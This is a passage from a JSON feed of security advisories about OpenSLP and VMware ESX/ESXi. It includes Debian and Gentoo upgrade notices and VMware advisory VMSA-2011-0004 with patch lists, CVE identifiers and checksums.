SLPDProcessMessage() function could be used to cause\n openslp to crash.\n\nFor Debian 6 \"Squeeze\", these problems have been fixed in openslp-dfsg\nversion 1.2.1-7.8+deb6u1.\n\nWe recommend that you upgrade your openslp-dfsg packages.\n\nLearn more about the Debian Long Term Support (LTS) Project and how to\napply these updates at: https://wiki.debian.org/LTS/\n", "edition": 7, "modified": "2015-09-03T07:43:26", "published": "2015-09-03T07:43:26", "id": "DEBIAN:DLA-304-1:F9879", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201509/msg00000.html", "title": "[SECURITY] [DLA 304-1] openslp-dfsg security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2017-07-08T16:15:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4912", "CVE-2010-3609", "CVE-2016-7567", "CVE-2012-4428"], "description": "### Background\n\nOpenSLP is an open-source implementation of Service Location Protocol (SLP). \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSLP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly cause a Denial of Service condition or have other unspecified impacts.
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSLP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/openslp-2.0.0-r4\"", "edition": 1, "modified": "2017-07-08T00:00:00", "published": "2017-07-08T00:00:00", "href": "https://security.gentoo.org/glsa/201707-05", "id": "GLSA-201707-05", "title": "OpenSLP: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2010-3609", "CVE-2010-2059", "CVE-2010-3316", "CVE-2010-3614", "CVE-2010-3613", "CVE-2010-3762", "CVE-2010-3435", "CVE-2010-3853"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2011-0004\r\nSynopsis: VMware ESX/ESXi SLPD denial of service vulnerability\r\n and ESX third party updates for Service Console\r\n packages bind, pam, and rpm.\r\nIssue date: 2011-03-07\r\nUpdated on: 2011-03-07 (initial release of advisory)\r\nCVE numbers: CVE-2010-3613 CVE-2010-3614 CVE-2010-3762\r\n CVE-2010-3316 CVE-2010-3435 CVE-2010-3853\r\n CVE-2010-2059 CVE-2010-3609\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n Service Location Protocol daemon (SLPD) denial of service issue and\r\n ESX 4.0 Service Console OS (COS) updates for bind, pam, and rpm.\r\n\r\n2. Relevant releases\r\n\r\n VMware ESXi 4.1 without patch ESXi410-201101201-SG.\r\n\r\n VMware ESXi 4.0 without patch ESXi400-201103401-SG.\r\n\r\n VMware ESX 4.1 without patch ESX410-201101201-SG.\r\n\r\n VMware ESX 4.0 without patches ESX400-201103401-SG,\r\n ESX400-201103404-SG, ESX400-201103406-SG, ESX400-201103407-SG.\r\n\r\n3. Problem Description\r\n\r\n a. 
Service Location Protocol daemon DoS\r\n\r\n This patch fixes a denial-of-service vulnerability in\r\n the Service Location Protocol daemon (SLPD). Exploitation of this\r\n vulnerability could cause SLPD to consume significant CPU\r\n resources.\r\n\r\n VMware would like to thank Nicolas Gregoire and US CERT for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\r\n has assigned the name CVE-2010-3609 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n vCenter any Windows not affected\r\n\r\n hosted * any any not affected\r\n\r\n ESXi 4.1 ESXi ESXi410-201101201-SG\r\n ESXi 4.0 ESXi ESXi400-201103401-SG\r\n ESXi 3.5 ESXi not applicable\r\n\r\n ESX 4.1 ESX ESX410-201101201-SG\r\n ESX 4.0 ESX ESX400-201103401-SG\r\n ESX 3.5 ESX not applicable\r\n ESX 3.0.3 ESX not applicable\r\n\r\n * hosted products are VMware Workstation, Player, Fusion.\r\n\r\n b. Service Console update for bind\r\n\r\n This patch updates the bind-libs and bind-utils RPMs to version\r\n 9.3.6-4.P1.el5_5.3, which resolves multiple security issues.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the names CVE-2010-3613, CVE-2010-3614, and\r\n CVE-2010-3762 to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available. 
\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n vCenter any Windows not affected\r\n\r\n hosted * any any not affected\r\n\r\n ESXi any ESXi not applicable\r\n\r\n ESX 4.1 ESX affected, patch pending\r\n ESX 4.0 ESX ESX400-201103407-SG\r\n ESX 3.5 ESX not applicable\r\n ESX 3.0.3 ESX not applicable\r\n\r\n * hosted products are VMware Workstation, Player, Fusion.\r\n\r\n c. Service Console update for pam\r\n\r\n This patch updates the pam RPM to pam_0.99.6.2-3.27.5437.vmw,\r\n which resolves multiple security issues with PAM modules.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the names CVE-2010-3316, CVE-2010-3435, and\r\n CVE-2010-3853 to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n vCenter any Windows not affected\r\n\r\n hosted * any any not affected\r\n \r\n ESXi any ESXi not applicable\r\n\r\n ESX 4.1 ESX affected, patch pending\r\n ESX 4.0 ESX ESX400-201103404-SG\r\n ESX 3.5 ESX not applicable\r\n ESX 3.0.3 ESX not applicable\r\n\r\n * hosted products are VMware Workstation, Player, Fusion.\r\n\r\n d. 
Service Console update for rpm, rpm-libs, rpm-python, and popt\r\n\r\n This patch updates rpm, rpm-libs, and rpm-python RPMs to\r\n 4.4.2.3-20.el5_5.1, and popt to version 1.10.2.3-20.el5_5.1,\r\n which resolves a security issue.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2010-2059 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n vCenter any Windows not affected\r\n\r\n hosted * any any not affected\r\n\r\n ESXi any ESXi not applicable\r\n\r\n ESX 4.1 ESX affected, patch pending\r\n ESX 4.0 ESX ESX400-201103406-SG\r\n ESX 3.5 ESX not applicable\r\n ESX 3.0.3 ESX not applicable\r\n \r\n * hosted products are VMware Workstation, Player, Fusion.\r\n\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and version\r\n and verify the checksum of your downloaded file.\r\n\r\n ESXi 4.1 Installable Update 1\r\n -----------------------------\r\n \r\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_\r\n0\r\n Release Notes:\r\n \r\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.ht\r\nml\r\n http://kb.vmware.com/kb/1027919\r\n\r\n File type: .iso\r\n MD5SUM: d68d6c2e040a87cd04cd18c04c22c998\r\n SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64\r\n\r\n ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1)\r\n File type: .zip\r\n MD5SUM: 2f1e009c046b20042fae3b7ca42a840f\r\n SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1\r\n\r\n ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0)\r\n File type: .zip\r\n MD5SUM: 67b924618d196dafaf268a7691bd1a0f\r\n SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516 \r\n\r\n ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5)\r\n File type: .zip\r\n MD5SUM: 
a6024b9f6c6b7b2c629696afc6d07cf4\r\n SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488 \r\n\r\n VMware Tools CD image for Linux Guest OSes\r\n File type: .iso\r\n MD5SUM: dad66fa8ece1dd121c302f45444daa70\r\n SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af \r\n\r\n VMware vSphere Client\r\n File type: .exe\r\n MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e\r\n SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\r\n\r\n ESXi Installable Update 1 contains the following security bulletins:\r\n ESXi410-201101201-SG.\r\n\r\n ESX 4.1 Update 1\r\n ----------------\r\n \r\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_\r\n0\r\n Release Notes:\r\n \r\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.htm\r\nl\r\n http://kb.vmware.com/kb/1029353\r\n\r\n ESX 4.1 Update 1 (DVD ISO)\r\n File type: .iso\r\n md5sum: b9a275b419a20c7bedf31c0bf64f504e\r\n sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11 \r\n\r\n ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1)\r\n File type: .zip\r\n md5sum: 2d81a87e994aa2b329036f11d90b4c14\r\n sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798 \r\n\r\n Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1\r\n File type: .zip\r\n md5sum: 75f8cebfd55d8a81deb57c27def963c2\r\n sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2 \r\n\r\n ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0)\r\n File type: .zip\r\n md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2\r\n sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922 \r\n\r\n VMware Tools CD image for Linux Guest OSes\r\n File type: .iso\r\n md5sum: dad66fa8ece1dd121c302f45444daa70\r\n sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af \r\n\r\n VMware vSphere Client\r\n File type: .exe\r\n md5sum: cb6aa91ada1289575355d79e8c2a9f8e\r\n sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\r\n\r\n ESX410-Update01 contains the following security bulletins:\r\n ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL,\r\n Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904\r\n 
ESX410-201101226-SG (glibc) | http://kb.vmware.com/kb/1031330\r\n\r\n ESX410-Update01 also contains the following non-security bulletins\r\n ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG,\r\n ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG,\r\n ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG,\r\n ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG,\r\n ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG,\r\n ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG.\r\n\r\n To install an individual bulletin use esxupdate with the -b option.\r\n\r\n ESXi 4.0\r\n --------\r\n ESXi400-201103001\r\n \r\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-274-20110303-677\r\n367/ESXi400-201103001.zip\r\n md5sum: a68ef31414573460cdadef4d81fb95d0\r\n sha1sum: 7155e60962b21b5c295a2e9412ac4a445382db31\r\n http://kb.vmware.com/kb/1032823\r\n\r\n ESXi400-201103001 containes the following security bulletins:\r\n ESXi400-201103401-SG (openssl) | http://kb.vmware.com/kb/1032820\r\n ESXi400-201103402-SG | http://kb.vmware.com/kb/1032821\r\n \r\n ESX 4.0\r\n -------\r\n ESX400-201103001\r\n \r\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-273-20110303-574\r\n144/ESX400-201103001.zip\r\n md5sum: 5b9a0cfe6c0ff1467c09c8d115910ff8\r\n sha1sum: 8bfb5df8066a01704eaa24e4d8a34f371816904b\r\n http://kb.vmware.com/kb/1032822\r\n\r\n ESX400-201103001 containes the following security bulletins:\r\n ESX400-201103401-SG (SLPD, openssl, COS kernel) \r\n | http://kb.vmware.com/kb/1032814\r\n ESX400-201103403-SG (JRE, Tomcat) | http://kb.vmware.com/kb/1032815\r\n ESX400-201103404-SG (pam) | http://kb.vmware.com/kb/1032816\r\n ESX400-201103405-SG (bzip2) | http://kb.vmware.com/kb/1032817\r\n ESX400-201103406-SG (popt/rpm) | http://kb.vmware.com/kb/1032818\r\n ESX400-201103407-SG (bind) | http://kb.vmware.com/kb/1032819\r\n5. 
References\r\n\r\n CVE numbers\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3613\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3614\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3762\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3316\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3435\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3853\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3609\r\n\r\n- ------------------------------------------------------------------------\r\n6. Change log\r\n\r\n2011-03-07 VMSA-2011-0004\r\nInitial security advisory in conjunction with the release of VMware\r\nESX/ESXi 4.0 patches on 2011-03-07\r\n\r\n- -----------------------------------------------------------------------\r\n7. Contact\r\n\r\nE-mail list for product security notifications and announcements:\r\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\nThis Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\nE-mail: security at vmware.com\r\nPGP key at: http://kb.vmware.com/kb/1055\r\n\r\nVMware Security Advisories\r\nhttp://www.vmware.com/security/advisories\r\n\r\nVMware security response policy\r\nhttp://www.vmware.com/support/policies/security_response.html\r\n\r\nGeneral support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos.html\r\n\r\nVMware Infrastructure support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos_vi.html\r\n\r\nCopyright 2011 VMware Inc. 
All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 9.8.3 (Build 4028)\r\nCharset: utf-8\r\n\r\nwj8DBQFNdceBS2KysvBH1xkRAs3MAJ0ezxEepDLaIgTNPd0v4QBrdw6ssQCfRgPw\r\nXlxhmCY1Md8s4gnoyjDGvnE=\r\n=kJHZ\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-03-10T00:00:00", "published": "2011-03-10T00:00:00", "id": "SECURITYVULNS:DOC:25898", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25898", "title": "VMSA-2011-0004 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:42", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3609", "CVE-2010-2059", "CVE-2010-3316", "CVE-2010-3614", "CVE-2010-3613", "CVE-2010-3762", "CVE-2010-3435", "CVE-2010-3853"], "description": "a. Service Location Protocol daemon DoS \nThis patch fixes a denial-of-service vulnerability in the Service Location Protocol daemon (SLPD). Exploitation of this vulnerability could cause SLPD to consume significant CPU resources. \nVMware would like to thank Nicolas Gregoire and US CERT for reporting this issue to us. \nThe Common Vulnerabilities and Exposures project ([cve.mitre.org](<http://www.cve.mitre.org/>)) has assigned the names CVE-2010-3609 to this issue. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 4, "modified": "2012-01-30T00:00:00", "published": "2011-03-07T00:00:00", "id": "VMSA-2011-0004", "href": "https://www.vmware.com/security/advisories/VMSA-2011-0004.html", "title": "VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.", "type": "vmware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}